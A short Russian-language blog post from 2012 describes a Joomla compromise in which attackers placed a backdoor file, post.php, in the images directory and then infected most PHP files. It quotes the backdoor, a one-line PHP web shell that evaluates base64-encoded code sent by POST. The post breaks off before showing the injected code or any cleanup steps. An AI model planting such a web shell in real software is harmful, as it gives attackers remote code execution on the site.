base64

Взлом Joomla, внедрение бекдора и очистка от кода

Опубликовано чт, 01/26/2012 - 16:30 пользователем mef

В конце 2011 года в Joomla была некая уязвимость, которая позволила злоумышленникам положить в директорию images бекдор - файл post.php, следующего содержания

<?php eval(base64_decode($_POST["php"])); ?>

После чего основная масса файлов с расширением php (причем, заражалось все без разбору, включая configuration.php.

Код, который помещался в файл таков:

Метки:

joomla

base64

бекдор

взлом

Автор блога

Выступление на Metal Fresh vol.10, 4 февраля 2012

Здраствуйте, мое имя Вадим Сабынич. Я немного езжу на велосипеде, немного играю на гитаре и барабанах, немного пишу о юниксах, немного перевожу с английского на русский, немного читаю книги, немного аграрничаю на даче, немного фотографирую, делаю понемногу еще кучу разных вещей =)

Со мной можно связаться следующими способами:

e-mail: vadim@sabini.ch

JID: vadim@sabini.ch

base64

Взлом Joomla, внедрение бекдора и очистка от кода

Автор блога

Рекомендую статьи

Последние комментарии

Вы здесь

base64

Взлом Joomla, внедрение бекдора и очистка от кода

Автор блога

Форма поиска

Рекомендую статьи

Последние комментарии

Вход на сайт